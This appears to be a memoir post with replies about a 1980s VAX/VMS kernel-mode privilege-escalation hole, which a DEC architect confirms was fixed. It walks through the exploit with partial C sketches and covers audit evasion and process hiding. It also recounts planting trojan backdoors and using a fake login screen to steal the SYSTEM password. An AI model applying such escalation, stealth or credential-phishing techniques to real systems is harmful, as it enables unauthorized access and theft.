The great VAX/VMS security hole (a reminiscence)

 

Subscribers to the OpenVMS hobbyist program might remember that a little while ago John Egolf of HP suggested that program participants share personal recollections related to VMS, to commemorate the 35th anniversary of VMS's initial release.

 

I briefly contemplated writing something along the lines of "VMS security hole exploits in my young student days" or "Adventures of VAX/VMS behind the Iron Curtain", but had doubts whether these would be fitting subjects, so I did not. With time passed, though, I thought I'd still share a certain recollection on the former subject in this less formal venue (comp.os.vms).

 

Over my student days in the mid-80's I came across a number of security holes in VMS. Getting my hands (with a little help from my friends) on the VAX/VMS source kit helped in this activity, among others. Most of these holes would be considered "the usual stuff" today, such as stack buffer overruns in privileged programs, but in the 1980's explorations of this kind were newish, a kind of petty frontier and an entertaining challenge, akin to cracking mathematical riddles.

 

However, the most magnificent and fascinating VMS hole I ever found came, surprisingly, not from looking into the VMS sources, and even before I had secured their possession for myself. At the time I discovered this particular hole I was armed only with DEC's public VAX/VMS documentation set (system services and so on) and a photocopy of "Internals and Data Structures" (from the look of it, I think it was actually a photocopy of a photocopy), but while the latter was useful, it was not absolutely crucial -- I think the hole could have been discovered based on the standard VMS documentation alone.

 

Indeed, the way I remember spotting it, I was flipping back and forth between certain pages in the System Services manual and getting a gut feeling: "there has just got to be a hole in here!" And indeed, there it was. To rephrase the character from the movie Capricorn One (https://www.youtube.com/watch?v=9uHhB_Wzccw), "a first-magnitude, bona fide, made-in-the-USA security hole".

 

The hole let an unprivileged user-mode program switch into kernel mode.

 

But more spectacularly, the hole was tightly coupled to the unique architectural design of VMS, and in its sly and teasing way showed off the importance of the "V" in "VMS".

 

All the other VMS holes I discovered are easily conceivable in other operating systems and are actually present in them; they are today's "commodity holes". Not the Great Hole. Although in a way it was very simple and represented an overlooked crack between principal OS components, it had a unique beauty and was unique to VMS's fundamental architecture. No hole of that particular nature is possible in any other operating system.

 

The hole was there most likely from day one of VMS, and definitely lasted throughout the 3.x and 4.x timeframe, which is when I was using it. After that I ceased to be a student and also got VAXen of my own (a cluster of three VAXstation 3200's, all running multiuser VMS and wired to multiple huge-capacity 850 MB drives, 9-track StorageTek tapes, Emulex terminal servers etc., making for a nice LEGO set), so poking holes lost its former appeal, and I am not sure of the Great Hole's subsequent fate (a little more on that below). I will describe it as it stood tall in VMS 3.x and 4.x days.

 

As most here know, one unique feature of VMS was privileged shareable images (DLLs/DSOs in today's parlance) that could contain code invoked in kernel or executive mode, a.k.a. protected-mode images. This architectural feature allowed customers and third parties to pack custom system calls into a DLL and develop custom privileged components accessing kernel-mode or executive-mode structures or routines. Custom privileged-mode (kernel-mode or executive-mode) code did not have to reside in a driver; system extensions that did not need to be resident all the time could instead be implemented as DLLs, with the privileged-mode code residing right in the DLL.

 

One very prominent example was a non-standard variation of the feature used by the Oracle database, which had its shared data (the SGA) stored in a system-wide global section owned by supervisor mode, mapped into and accessible within process context, but not corruptible by user-mode code; the private parts of the SGA were not even snoopable by user-mode code. To access the SGA, user-mode code did not have to go out of process: it just had to execute a CHMS instruction and proceed in supervisor mode within the process, without incurring the cost of a process context switch to access the protected data.

 

The feature was also used to host some standard VMS system services that were used infrequently and did not need to be resident or be part of the kernel, such as MOUNT/DISMOUNT and a few others.

 

A protected-mode image would typically contain the following sections:

 

1) Call vectoring section. In the days of limited computer resources, image-to-image runtime binding was normally done not via symbols searched at image activation time, but via binary offsets into the target image. Shareable images exported symbols, but the symbols were used only by the linker (and by dynamic loading routines similar to Linux dlopen/dlsym), not by the mainline runtime image activator. Instead, the image would have a separate section at its very base with one entry per exported routine, and the entry would contain a jump instruction to the actual routine body located somewhere inside the image. Grouping these call transfer vectors into a vectoring section at the base of the image, with all transfer vectors maintained at unchanged offsets from the image base, allowed the image to be changed and rebuilt without breaking compatibility with dependent images. (A rough C analogy of this is sketched right after this list.)

 

2) Optionally, some user-mode code sections. At a minimum, this would typically be the code that executed the CHMK and CHME instructions carrying out the callers' requests. If memory serves, a CHMx and RET could fit into (1) as well, as long as you maintained proper padding after them so that they could be changed to a BRW/JMP if needed, so in the most basic case having a user-mode section was optional. User-mode code could also be put into (4), since both were read-only.

 

3) "Protected-mode vector section" or "CHMx vector section". Code in this section would be invoked by VMS CHMK/CHME handler, and would check CHMx code and if matching to codes served by this image, dispatch request to the handler in (4).

 

4) Kernel-mode or executive-mode code sections. These contained the code that would receive control from the "protected-mode vector" dispatcher (3).

 

5) Data sections.
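
For readers who never saw a VAX transfer vector, here is a rough C analogy of the idea in (1) -- the real thing was a handful of jump instructions emitted at the image base in VAX MACRO, not C function pointers -- showing why binding callers to fixed slot offsets lets the routine bodies move freely between rebuilds:

    /* Rough C analogy of a transfer-vector section (not actual VAX code).
     * Dependent "images" bind only to the fixed slot index/offset below;
     * the implementation routines behind the slots may move around between
     * rebuilds without breaking that binding. */
    #include <stdio.h>

    typedef int (*xfer_slot_t)(void);

    /* Implementation routines live "somewhere inside the image"... */
    static int real_routine_a(void) { return 1; }
    static int real_routine_b(void) { return 2; }

    /* ...while the vector at the image base keeps stable offsets:
     * slot 0 at base+0, slot 1 at base+sizeof(xfer_slot_t), and so on. */
    static const xfer_slot_t transfer_vector[] = {
        real_routine_a,    /* exported entry #0 */
        real_routine_b,    /* exported entry #1 */
    };

    int main(void)
    {
        /* A caller only ever knows the slot index (i.e. the fixed offset). */
        printf("%d %d\n", transfer_vector[0](), transfer_vector[1]());
        return 0;
    }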

 

Control flow would be as follows:

 

user-mode code ->

xfer vector in protected-mode shareable image ->

CHMK(code) or CHME (code) ->

VMS CHMx (system call) dispatcher ->

for each protected-mode image activated in process, its CHMx vector ->

kernel-mode or executive-mode code in the shareable image

 

To enable activation of the protected-mode vector, the protected image had to be installed in the system with the INSTALL command, specifying the /PROTECTED option.

 

Just like for any other shareable image, INSTALL would at this point create system-wide global sections mapping the image file's sections, to speed up subsequent activations of the image and to provide sharing of the image code and read-only data between processes using it. The global sections would be named XXX_001, XXX_002 and so on, where XXX is the name of the image (XXX.EXE). When a process subsequently activated an executable linked against the protected-vector image, the latter would be mapped into the process address space like this:

 

              (image base/low VA)

    +-------------------------------------+

    |         Call xfer vector            |   XXX_001

    +-------------------------------------+

    |      User-mode code (if any)        |   XXX_002

    +-------------------------------------+

    |            CHMx vector              |   XXX_003

    +-------------------------------------+

    |  Kernel-mode or executive-mode code |   XXX_004

    |            (section 1)              |  

    +-------------------------------------+

    |  Kernel-mode or executive-mode code |   XXX_005

    |            (section 2)              |  

    +-------------------------------------+

    |                etc.                 |   XXX_006

    +-------------------------------------+

                  (high VA)

 

I.e. it would have the same layout as any other installed image, including images installed merely for code sharing and activation speed-up, and images installed with enhanced image privileges (akin to Linux setcap).

 

One essential difference was that global sections coming from a protected-mode image (except those specifically marked otherwise) were created as owned by executive mode, with a default protection of UR for code and UREW for data, so user-mode code was able to alter neither the content of these pages nor their mapping. All it could do was invoke the code, and the only jump into kernel-mode or executive-mode code was through the CHMx "gate". So it was all very secure.

 

Except there was a tiny crack between two VMS subsystems: the image activator and virtual memory on one hand, and logical names on the other.

 

When activating any image, including protected-mode images, the image activator would map into the process address space each of the image's global sections pre-created earlier by INSTALL. This mapping was carried out using SYS$MGBLSC, the system call to map a global section, specifying the flag SEC$M_SYSGBL (i.e. limiting the search to system-wide global sections only). It would map XXX_001, XXX_002 and so on. Each section was mapped at an offset from the base VA of the image, recorded in the section descriptor in the image and subsequently moved into memory-resident INSTALL data.
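
To make the mechanics concrete, here is a minimal C sketch of what that per-section mapping amounted to. This is not the actual SYS$IMGACT code; the section name XXX_005, the address arithmetic and the access-mode argument are simplified placeholders, and only SYS$MGBLSC and the SEC$M_SYSGBL flag come from the description above:

    /* Minimal sketch of activator-style mapping of one installed global
     * section at a fixed offset from the image base (VAX-era 32-bit layout).
     * Not the real SYS$IMGACT code; names and modes are simplified. */
    #include <descrip.h>
    #include <secdef.h>
    #include <starlet.h>

    int map_one_section(unsigned int image_base, unsigned int offset,
                        unsigned int length)
    {
        $DESCRIPTOR(gsdnam, "XXX_005");     /* section name recorded by INSTALL */
        unsigned int inadr[2], retadr[2];

        inadr[0] = image_base + offset;              /* first VA to map */
        inadr[1] = image_base + offset + length - 1; /* last VA to map  */

        /* SEC$M_SYSGBL restricts the *search* to system-wide global sections,
         * but -- and this was the crack -- the name "XXX_005" still went
         * through GBL$ logical name translation first. */
        return sys$mgblsc((void *)inadr, (void *)retadr,
                          0 /* access mode, simplified */,
                          SEC$M_SYSGBL, &gsdnam, 0, 0);
    }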

 

What was overlooked was that SYS$MGBLSC used logical names to translate the section name before performing the mapping.

 

If SYS$MGBLSC was requested to map section XXX_005, but you had defined the logical name GBL$XXX_005 => YYY_333, SYS$MGBLSC would map YYY_333 instead of XXX_005.
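
Here is a minimal sketch of the user's side of that redirection, keeping the placeholder names XXX_005 and YYY_333 from the text. Interactively it was just a one-line DEFINE at the DCL prompt; the C version below does the same with SYS$CRELNM in the process logical name table:

    /* Minimal sketch: define GBL$XXX_005 => YYY_333 as an ordinary user-mode
     * process logical name, so that a later SYS$MGBLSC of "XXX_005" maps the
     * pre-existing system-global section YYY_333 instead.  Placeholder names;
     * the item list uses the VAX-era 32-bit item_list_3 layout. */
    #include <descrip.h>
    #include <lnmdef.h>
    #include <starlet.h>
    #include <string.h>

    int redirect_section(void)
    {
        $DESCRIPTOR(tabnam, "LNM$PROCESS");    /* per-process, user-mode table */
        $DESCRIPTOR(lognam, "GBL$XXX_005");    /* name SYS$MGBLSC will translate */
        static char target[] = "YYY_333";      /* some existing system-global section */

        struct {
            unsigned short buflen, itmcod;
            void *bufadr, *retlen;
        } itmlst[2];

        itmlst[0].buflen = (unsigned short)strlen(target);
        itmlst[0].itmcod = LNM$_STRING;        /* equivalence string */
        itmlst[0].bufadr = target;
        itmlst[0].retlen = 0;
        memset(&itmlst[1], 0, sizeof itmlst[1]);   /* list terminator */

        return sys$crelnm(0, &tabnam, &lognam, 0, itmlst);
    }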

 

Note that you could not use your own (i.e. group-global) section named YYY_333. Because the SEC$M_SYSGBL flag limited the search to system-wide section names only, YYY_333 had to be a system-global section, which could not be created without the SYSGBL privilege. YYY_333 had to be a pre-existing system-global section.

 

However, with a typical system having dozens if not hundreds of system-global sections resulting from a multitude of installed images, it was always easy to find an existing system-wide global section YYY_333 that, once the GBL$ logical name redirection was defined, would get mapped in place of XXX_005, at the address (relative to the image base) intended for XXX_005. If YYY_333 was shorter than XXX_005, this would result in the following layout:

 

              (image base/low VA)

    +-------------------------------------+

    |         Call xfer vector            |   XXX_001

    +-------------------------------------+

    |      User-mode code (if any)        |   XXX_002

    +-------------------------------------+

    |            CHMx vector              |   XXX_003

    +-------------------------------------+

    |  Kernel-mode or executive-mode code |   XXX_004

    |            (section 1)              |  

    +-------------------------------------+

    |         Counterfeit section         |   YYY_333

    +-------------------------------------+

    |         (address space hole)        |   (HOLE)

    |            (unallocated)            |  

    +-------------------------------------+

    |                etc.                 |   XXX_006

    +-------------------------------------+

                  (high VA)

 

At this point it was a matter of identifying a particular CHMx vector in XXX_003 that dispatched high enough into XXX_005's range that its target branch would obligingly land in the HOLE. Then you could create regular user-mode pages in the HOLE, fill them with your own code, call the appropriate CHMx service such as SYS$MOUNT and -- voila! -- you were in kernel (or executive) mode, just as you had always wished to be.
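
A minimal sketch of the page-creation step, with a made-up address range standing in for the HOLE (the real one, of course, depended on the actual image layout); the payload and the final CHMx call are deliberately left as comments:

    /* Minimal sketch: create ordinary user-mode demand-zero pages over the
     * unmapped HOLE left behind the shorter counterfeit section.  The address
     * range below is hypothetical; the payload itself is omitted. */
    #include <psldef.h>
    #include <starlet.h>

    #define HOLE_FIRST_VA 0x00012a00u    /* hypothetical: depends on image layout */
    #define HOLE_LAST_VA  0x00012fffu

    int fill_hole(void)
    {
        unsigned int inadr[2] = { HOLE_FIRST_VA, HOLE_LAST_VA };
        unsigned int retadr[2];
        int status;

        /* Pages created here are plain user-owned pages; the kernel-mode
         * dispatch out of the XXX_003 vector will now land on code we wrote. */
        status = sys$cretva((void *)inadr, (void *)retadr, PSL$C_USER);
        if (!(status & 1))
            return status;

        /* ...copy the hand-written payload into the HOLE here, then invoke
         * the chosen CHMx service (e.g. SYS$MOUNT) to have it executed in
         * kernel or executive mode. */
        return status;
    }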

 

The exploit depended on the particular set of protected-mode images installed and their exact layout, but every single time I checked in the VAX/VMS 3.x and 4.x timeframe, I was easily able to find a matching pair of XXX and YYY images that would work. Usually just checking MOUNTSHR and DISMNTSHR was enough.

 

The most typical code you wished to put into your handler in the HOLE was code to set the process's authorized privilege mask in the CTL region to all ones.

 

Also, once in kernel mode, and not being authorized by the machine's formal owners to be there, it was prudent to set the NOAUDIT flag in the PCB, as well as the DELPEN flag.

 

The latter marked the process as "delete pending", which interfered with virtually none of its normal use but prevented any "SHOW PROCESS" etc. against it -- in a word, you had a cloak of invisibility (except, of course, against somebody possibly looking at the process with SDA). The gotcha was that you had to remember to reset DELPEN before logging out. If you did not, the process would go into a tight spin loop consuming as much CPU time as its priority allowed, with no regular way to kill it, and that would draw unwanted attention and lead to your downfall.

 

In retrospect, the Great VMS Security Hole resulted from a relatively obscure feature of one component (GBL$ logical name translation by SYS$MGBLSC) being overlooked by the developers of another component (SYS$IMGACT), who were none other than, originally, Peter Lippman himself, followed at various times by Lawrence Kenah, with occasional stepping in by Kathleen Morse, Wayne Cardoza and a few others -- about as good a set of developers/architects as one could ever dream of getting.

 

The bug would have been easily correctable by passing a flag limiting name translation to logical names defined in EXEC or KRNL mode only, or (even more logically) by limiting name translation to system-wide logical names only when the SEC$M_SYSGBL flag was specified in the call to SYS$MGBLSC.
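
To illustrate what "limiting translation to names defined in EXEC or KRNL mode" means in practice, here is a small reconstruction of a mode-restricted lookup using the access-mode argument of SYS$TRNLNM. This is my own sketch of the idea, not the code of the actual fix, and the table and name used are placeholders:

    /* Sketch of "trusted-only" name translation: with the access mode set to
     * executive, user- and supervisor-mode definitions of GBL$XXX_005 are not
     * seen at all, so a malicious redirection defined from DCL is ignored. */
    #include <descrip.h>
    #include <lnmdef.h>
    #include <psldef.h>
    #include <starlet.h>

    int translate_trusted(char *result, unsigned short *result_len)
    {
        $DESCRIPTOR(tabnam, "LNM$FILE_DEV");   /* standard search list */
        $DESCRIPTOR(lognam, "GBL$XXX_005");    /* placeholder name from the text */
        unsigned char acmode = PSL$C_EXEC;     /* ignore outer-mode definitions */

        struct {                               /* item_list_3, 32-bit layout */
            unsigned short buflen, itmcod;
            void *bufadr, *retlen;
        } itmlst[2];

        itmlst[0].buflen = 255;
        itmlst[0].itmcod = LNM$_STRING;        /* return the equivalence string */
        itmlst[0].bufadr = result;
        itmlst[0].retlen = result_len;
        itmlst[1].buflen = 0;                  /* terminator */
        itmlst[1].itmcod = 0;
        itmlst[1].bufadr = 0;
        itmlst[1].retlen = 0;

        return sys$trnlnm(0, &tabnam, &lognam, &acmode, itmlst);
    }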

 

The thing is, as best my memory serves, although the CPU mode attribute was always a part of a logical name (it is present in the original SYS$CRELOG service), the distinction between protected-mode names and non-protected ones did not become prominent until DEFINE /EXECUTIVE_MODE was introduced as a DCL command at some point in 4.x (although I may be remembering the timing wrong). While this would logically make the need to check the name's mode even more urgent (since virtually all names were non-protected in the CPU-mode sense), psychologically it might have helped to further obscure the GBL$ translation done by SYS$MGBLSC.

 

As I mentioned above, the Great Hole was alive and well in VMS from probably day one throughout VMS 3.x and 4.x, which was when I was personally using it.

I am not quite sure of its further fate.

 

On a minor note, the naming scheme for global sections created by INSTALL has since changed from XXX_nnn to INS$xxxxxxxx_nnn, where xxxxxxxx is the hexadecimal address of the KFE (known file entry). However, since KFEs are located in a somewhat predictable range of memory and are allocated with 16-byte granularity, it is easy and should not be computationally expensive to enumerate all possible values of xxxxxxxx and (looping SYS$MGBLSC over the possible range of values) find out which ones are valid and map them to known installed images and their sections. In other words, it is not hard to find the INS$xxxxxxxx_nnn equivalents of the old XXX_nnn and YYY_nnn.
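
A sketch of that brute-force enumeration, purely to illustrate the idea; the INS$ name format, the candidate KFE address range and the 16-byte step here are assumptions taken from the paragraph above, not verified against any particular VMS version:

    /* Sketch: probe candidate INS$xxxxxxxx_nnn section names by attempting to
     * map each one into free P0 space and immediately unmapping the ones that
     * succeed.  (Sections the user cannot map at all will look nonexistent to
     * this probe.)  Address range, name format and digit widths are guesses. */
    #include <stdio.h>
    #include <string.h>
    #include <descrip.h>
    #include <secdef.h>
    #include <starlet.h>

    static int section_exists(const char *name)
    {
        struct dsc$descriptor_s gsdnam;
        unsigned int inadr[2] = { 0, 0 };      /* with SEC$M_EXPREG: expand P0 */
        unsigned int retadr[2];
        int status;

        gsdnam.dsc$w_length  = (unsigned short)strlen(name);
        gsdnam.dsc$b_dtype   = DSC$K_DTYPE_T;
        gsdnam.dsc$b_class   = DSC$K_CLASS_S;
        gsdnam.dsc$a_pointer = (char *)name;

        status = sys$mgblsc((void *)inadr, (void *)retadr, 0,
                            SEC$M_SYSGBL | SEC$M_EXPREG, &gsdnam, 0, 0);
        if (status & 1)
            sys$deltva((void *)retadr, 0, 0);  /* drop the probe mapping */
        return (status & 1) != 0;
    }

    int main(void)
    {
        unsigned int kfe;
        char name[32];

        /* Hypothetical pool range; KFEs are allocated on 16-byte boundaries. */
        for (kfe = 0x80400000u; kfe < 0x80500000u; kfe += 16) {
            sprintf(name, "INS$%08X_001", kfe);
            if (section_exists(name))
                printf("%s\n", name);
        }
        return 0;
    }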

 

On a bigger note, somewhere in the VMS 5.x time frame the image activator added a flag, IAC$V_PARANOID, meant to be forced on when protected-mode images are activated. I did not bother to trace exactly what this flag does (who really cares anymore?), but it appears to translate further into SEC$V_PARANOID, which limits logical name translation to EXEC- or KRNL-mode names only, and thus presumably closes the Great Hole somewhere in the 1993 timeframe and onward in the Alpha and Itanium codebases (the latter also added an IMAGCTX$V_TRUSTED_LNM flag in 2002 -- so much ado instead of just a straightforward check for SEC$M_SYSGBL).

 

Whether the closure is complete, I did not try to check and thus cannot tell.

Which I guess is no big deal.

It's all ancient history now.

 


One of the responses to this little memoir was from Andy Goldstein, one of the key VMS architects at DEC (and after its demise, at Compaq and HP) from day one until the termination of the remnants of the VMS Engineering team by HP in 2009.


Hi Sergey -

Good to hear from you!

I remember this one well. We called it the Novosibirsk bug, because it was reported to us by Mikhail Beilin at the Institute for Nuclear Physics in Novosibirsk. (He sent it to colleagues at CERN, and they passed it on to us.) We did indeed fix it in some V5.x version - can't remember exactly which one, but it was whatever VMS release went out after it was reported to us, somewhere around 1990. We might also have issued an emergency patch to all customers on support - we did that if there was any risk of a security bug becoming public knowledge.

I carried on an email conversation with Mikhail, since we wanted to send him a patch immediately and we needed to know what VMS version he was running. I'll never forget one of Mikhail's responses: "Unfortunately we are unlicensed VMS site. This is owing to historical reasons like Cold War." (Of course this didn't matter to us one way or the other. When someone reported a security bug we sent a patch and asked questions later.)

The nature of the bug is exactly as you described: The ability to substitute one protected shareable image for another with untrusted logical names, and then with clever matching up of shareable images, getting a kernel mode call redirected into address space under the user's control.

This was not a day 1 bug, however, and the way it came about is a typical case of lack of coordination of concurrent projects. We added protected shareable images in VMS V2.0 as part of a collection of real time support features. Larry Kenah did the image activator work for this. At the same time, Kathy Morse did shared memory support. This was for the MA-780 memory unit that could be connected to up to four VAX-11/780 cpus to provide high speed communication between the VMS systems. The shared memory support allowed event flags, mailboxes, and global sections to be located in the MA-780 and be shared among the VMS systems. This was where the logical name translation was added to $MGBLSC, to allow existing applications to redirect their global sections to the MA-780 without having to recode them.

Since these projects were concurrently developed, the interaction of logical names with protected shareable images was not discovered. Each project was reviewed against the design of the existing VMS system, but not against the other.

The change to limit logical name translation to trusted logicals (kernel and exec) did indeed fix this problem completely. (At least, as far as we ever heard.) The IAC$V_PARANOID flag is part of this logic. It is turned on to prevent any outbound calls from protected shareable images from being redirected with untrusted logical names. Inner mode code in protected shareable images is not supposed to call out to other shareable images, but in the case of mixed mode shareable images this can't be detected at image activation time. So we just protected all outbound calls and hoped the image designer knew what he was doing. (Admittedly a dubious assumption.)

The fix really did require using the SEC$V_PARANOID flag, expressly asserted by the image activator. The reason is that there is nothing wrong with using untrusted logical names for ordinary system global sections - as long as they can't be called as shareable images in inner mode. This was a feature we'd added in Kathy's work, and restricting logical name translation for system global sections would have broken user applications.

- Andy


To which I replied:


Hi Andy,

Thanks for your response.

> I'll never forget one of Mikhail's responses: "Unfortunately we are unlicensed VMS site. This is owing to historical reasons like Cold War."

I'd say the general practice in the Soviet Union was that all licenses were considered country-wide, meaning one license was considered good enough to cover the whole country. ;-)

The Cold War situation was undoubtedly one reason, but another was the general perception of software deriving from the fact that there was no software development industry in the USSR, so psychologically software was commonly looked at as something ephemeral, not rightfully deserving commercial value on its own -- a sort of documentation that ought to just come free with the computer. A computer was iron and clearly had value, whereas software... one could not even touch it!

Indeed, a while back I was amused to come across an article by a professor of computer science at Leningrad University (with the author sounding a little like a leftist in the USSR... go figure!), dating as late as the second half of the 1980's, complaining that sadly some programmers were trying to keep the source code of their programs to themselves and even charge for the use of the programs, comparing such reprehensible practices to usury. (To make the article more amusing, its author these days works in the U.S. for a commercial software company.)

 So "country-wide license" approach was in a way Free Software Foundation, Soviet style.

With VMS specifically, because the VAXes had to be smuggled in, their very existence (and therefore the use of VMS) was a hush-hush matter.

Although during the mid-80's 11/780's were a staple of technical computing, used in dozens of organizations throughout Moscow and around it -- mostly in places under the defense industry complex umbrella, but also in certain Academy of Sciences institutions, and even places like GOSPLAN -- security regulations did not allow mentioning their very existence. When you had to refer to a VAX in printed materials or any circulated document you were supposed to use euphemisms, and when specifics were absolutely necessary, to refer to the SM-1700 (the Soviet 11/730 clone), even though the latter was still vaporware and not actually being produced at the time.

So since VAXes in the Soviet Union "did not exist", the issue of unlicensed use of VMS and any layered software "did not exist" as well.

As one example, when I was purchasing those three VAXstation 3200's I mentioned earlier, I had to make a bet of sorts. The Soviet Union was not exactly flush with hard currency in the second half of the 1980's, and even though ours was a comparatively privileged place, we still had a limited hard-currency budget and needed to make the most of it, and we absolutely needed three VAXes running multiuser VMS: we needed to run a plant of 1500 workers designing and producing superconducting magnets and equipment for particle physics experiments, and therefore needed CAD/CAM workstations, terminals for multiple Oracle applications and so on. On the hardware side, we could go with MicroVAX IIIs and bundled multiuser VMS licenses, or with VAXstation 3200's and bundled single-user VMS (or even MicroVMS) licenses. The latter option was quite a bit cheaper, so we could spend more money on peripherals, and it also gave us three GPX workstations to boot, but there was no telling whether a VS3200 would run multiuser VMS out of the box -- if there were any VAXstations in the Soviet Union at that time at all, we did not know any owners, and almost certainly there were no VS3200's. So I had to make a kind of career bet, and decided to take the risk: we would go with the VS3200's, and if multiuser VMS refused to boot on a VS3200, complaining this was not a licensed configuration, I would find the check in the binaries and patch it out (at the time I had source code only for late 3.x, but we needed to run 4.7 and subsequent versions, so in finding such a check I would have been on my own). I remember that booting and logging into VMS for the first time on the VS3200 was tense, since I had no idea whether it would boot fine, refuse to boot, or refuse to enable more than one login session, and I was preparing to take a dive in search of that "if" statement or statements. Luckily, owing to the kind folks of Maynard, everything went fine without a glitch or any need to patch the system. ;-)

What's also funny is that we had plenty of data tapes (and people carrying tapes) going back and forth between our place and CERN, Fermilab, Lawrence Berkeley Lab and later the SSC, before the latter was shut down by Congress, and many of these tapes were VMS BACKUP tapes recorded on 11/780's, thus carrying an actual unique CPU ID that could have been used to track down those friends of the Soviet Union who had smuggled in the machines; but I guess the intelligence folks on both sides never figured this out. It seemed to be a concern only among our hardware engineers who ran the central cluster (initially composed of three 11/780's): I remember talking to one of them, and they hoped to somehow find where the ID register was located and change its value; I do not know if they ever did.

Another thing I remember is that the smuggling in an amusing way validated Karl Marx's notorious observation in "Das Kapital" where he quotes the economist T.J. Dunning: "With adequate profit, capital is very bold.... 100 percent will make it ready to trample on all human laws; 300 percent, and there is not a crime at which it will scruple, nor a risk it will not run, even to the chance of its owner being hanged."

Around 1987, when I was buying the VAXstations, they were mass-produced, compact and thus easily smugglable and not realistically traceable. The price markup at that point for the VS3200 itself was about 70% over its European price, and peripherals such as large-capacity Hitachi/Fujitsu disks, 9-track tape drives, Emulex controllers and terminal servers carried a 50% markup tag. With the 11/780 during its heyday in the early 80's it was very different: the markup was 3x. Similarly, FPS machines in the mid-80's and Convex machines in the late 80's went for 3x their price in the West -- just as Marx predicted. ;-)

Our place was also the only one in the USSR that had a DECsystem-10. It was a KL machine running TOPS-10.

Unlike the VAXes, the DECsystem-10 was purchased legally, perhaps as a fruit of the detente days.

I personally did not have much love for the DECsystem-10; the architecture felt cumbersome and certainly lacked the VAX's elegance, so the principal use I had for it was playing Star Wars. However, some of my groupmates were undeterred by the dated nature of the DECsystem-10, and one of them found a way to set the JACCT bit from an unprivileged process, thus gaining superuser mode. Another of my groupmates ported Johnson's PCC C compiler to TOPS-10 and wrote a basic CRTL, which I guess was likely the only implementation of C on the DECsystem-10 ever.

The mention of patching reminded me of another funny story. When leaving for the US in 1993, I made a backup of my files and left the tapes with friends; however, I did not ask for these tapes until almost 20 years later, when I wished to look at some of those files for sentimental reasons (there were some sentimentally interesting things there, such as my own port of TCP/IP to VMS, a lightweight "processes" framework in the kernel that I used to run an in-kernel telnet server, etc.). By that time the tapes had been lost and I could not recover them. Our former cluster also, of course, had long ceased to exist, and the machines had been junked. However, someone told me that the room that once hosted the cluster still had a cupboard with tapes in it, possibly including backup tapes. With some help from old friends I managed to get on site, behind the barbed wire, and into that room. There was indeed a cupboard filled with tapes. I picked those that looked promising, transported them to California and read them here. Alas, none contained the files I had hoped to find, although I came across some historically interesting catches, such as VMS 3.x (around the 3.7 time) and 4.0 source kits, which I was able to recover and handed over to the Computer History Museum. I also came across a few of my old files that had somehow survived, and one of them made me smile. It was a patch for TTDRIVER to enable Cyrillic keyboard handling. When trying to patch TTDRIVER, I had run into a bug in the PATCH utility itself, triggered when patching an image composed of only a single section. So I had to patch PATCH.EXE first to fix that bug, and then use the patched version of PATCH.EXE to patch TTDRIVER. (http://oboguev.livejournal.com/2590888.html)

And the last couple of these funny stories. At the time I was working on a VAX multiprocessor simulator, I visited Bernd Ulmann, who lives near Frankfurt (chances are you might remember him, and you two have definitely met; he used to be pretty active in German DECUS/CONNECT). He is the largest collector of VAX (and also some Alpha) equipment in Germany, and most likely in the whole world. He runs a publicly accessible VAX 7000/200 24/7 in his house basement, paying for this pleasure an electricity bill of 4K Euros a year. He also has a separate large house filled with various models of VAXes, including 7000s, 6000 vector machines, 8000-series machines, MicroVAXes, VAXstations, HSCs, star couplers, RA disks, you name it. Some of the models he has are exotic. For instance, he has a 3-CPU 8000-series machine (an 8330?) that was an engineering sample, but DEC Germany could never make it work right: the machine would have intermittent bus resets, and DEC engineers could never figure out why. After a time they gave up on it, and after some more time the machine landed in Bernd's barn. He also has a 32-processor Alpha (although he has never powered it up so far, for fear the lights would go out in the whole village). That machine was a custom order filled by Compaq Germany for a German customer. While Compaq was putting the machine together, the company that had ordered it went out of business, but the machine was already made, so it sat at Compaq for a while and eventually landed in Bernd's barn as well.

But one of his machines had perhaps an even more exotic fate: it was a MicroVAX III that was being shipped from Germany to the Soviet Union in the late 1980's when German customs intercepted the shipment. While the German authorities were trying to figure out what to do with it, customs put it in a warehouse, where it sat for the next 20 years. In the late 2000's German customs noticed that this box had been sitting there for 20 years and that it was time to do something about it after all. The box ended up in Bernd's barn. Bernd opened it, powered up the MicroVAX and installed VMS on it -- it worked flawlessly.

A few months after learning this story from Bernd (he told it to me while pointing at this MicroVAX) I was in my old cluster room, taking out the tapes. My friend and I took the selected tapes down to the building entrance, but we needed to transport them to another building on site, located about a mile away. The tapes were bulky and heavy, and carrying them that distance would have been difficult, so my friend called his colleague, also a physicist, who had a car pass for the site. His colleague came in his car, and while we were loading the tapes into the trunk, he looked at those tapes, recorded 20 to 25 years earlier, and said:

– I kind of doubt you'll be able to read them.

In response I told him the story of Bernd's MicroVAX that had sat in its box for 20 years and then worked just fine.

To which my friend's colleague responded with an instinctive exclamation, without an instant of thought:

– Of course! What could ever happen to it?! It's a VAX!


I also responded to another person with the following memories:


> When I was in college, I didn’t have that much time to hack privileges, so I got my elevated privileges via social engineering (watching privileged users type passwords) and then fixing my account  :-O

My very first VAX was an 11/780 in northern Moscow.
They also had an 11/750 sitting in the corner of the room, but it was not powered up or used while we were there.
They needed operators to run the machine (the 780) 24/7, and their full-time operator staffing covered only the daytime, so they needed someone to watch the machine at night and on weekends. For a time they hired students, about ten of us from MIPT, and at first they gave us the SYSTEM password.

Why they wished to run the machine 24/7 eluded me, because nobody ran anything on it at night or on weekends (no batch jobs etc.) until much later. During the day we could use the machine in regular timeshared mode, but at night and on weekends the machine was all ours in almost every practical sense of the word, with typically only 2 or 3 (occasionally 4 or 5) of us present in the building. I guess not too many students in the world around 1984-85 could say they had their own toy 11/780. ;-)

My very first ("hello world", as it would be called today) application consisted of SYS$CMKRNL, MFPR and printf.

Three or four months later the machine's owners got the idea that it might be undesirable to share the system password with hired students, and they changed it, but by that time it was too late: we had providently planted some trojan holes.

There is also the classic trick of getting a password whereby you leave running on a terminal an application that simulates the output of LOGOUT/FULL and prints the "Username:" and "Password:" prompts, records the captured password into a file, then prints a message that the entered password was invalid and exits the process. I.e., luring someone in with the look of a pretend LOGOUT screen and then snooping the password at the attempted "login". Such a program was written by one of my groupmates, in FORTRAN of all languages, in just about 10-20 lines of code. I was skeptical whether anybody would fall for it, but it worked without a glitch and allowed us to recover the SYSTEM password (not that it was much needed with all the pre-planted trojan holes, but still). Incidentally, the guy who wrote that FORTRAN program is now the CTO at Parallels (and also deputy-chairs computer science at MIPT), so if you are using Parallels on your Mac, beware: that FORTRAN program may still be lurking somewhere in the shadows ;-)

